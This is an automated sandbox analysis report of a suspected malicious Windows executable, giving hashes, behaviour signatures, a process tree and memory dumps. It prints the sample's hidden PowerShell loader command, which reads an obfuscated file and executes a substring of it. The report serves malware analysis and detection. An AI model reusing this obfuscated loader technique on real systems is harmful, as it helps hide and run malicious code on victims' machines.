Overview

overview

10

Static

static

3

71427E3016...7A.exe

windows7-x64

8

71427E3016...7A.exe

windows10-2004-x64

10

Wifiekie.ps1

windows7-x64

3

Wifiekie.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    19/03/2025, 15:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    71427E30168BE4926A10FE21DAE81C7A.exe

  • Size

    490KB

  • MD5

    71427e30168be4926a10fe21dae81c7a

  • SHA1

    aee4f1bec725c899b9a9f03f93a18a1947b79995

  • SHA256

    f9bc3826335bcf6a03da3b8743c2bdcbc7747962786a83c90fd2b1d3c8b85353

  • SHA512

    489c8f52af9111dd1c732afdd9d249c644da06892495c6bacc2f0f76b3d0b0b491fd2b5371f9859b676b2ae6b42039d4cc630e102f5774d2be92a839e3498847

  • SSDEEP

    12288:hd9jqKTPrjjpshfe+ZXP/51bt6YtRhp9S8Uy514LyYR27:zcK/5shfe+ZXZr7/hNU6OTR4

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\71427E30168BE4926A10FE21DAE81C7A.exe
    "C:\Users\Admin\AppData\Local\Temp\71427E30168BE4926A10FE21DAE81C7A.exe"
    1⤵
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2344
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Dynastinae=GC -Raw 'C:\Users\Admin\AppData\Roaming\Mellemstykke\ferskvandsfisks\Wifiekie.Ove';$Tenders=$Dynastinae.SubString(53339,3);.$Tenders($Dynastinae)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1636

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1636-9-0x0000000074351000-0x0000000074352000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1636-10-0x0000000074350000-0x00000000748FB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1636-11-0x0000000074350000-0x00000000748FB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1636-12-0x0000000074350000-0x00000000748FB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1636-13-0x0000000074350000-0x00000000748FB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1636-14-0x0000000074350000-0x00000000748FB000-memory.dmp

    Filesize

    5.7MB

    Download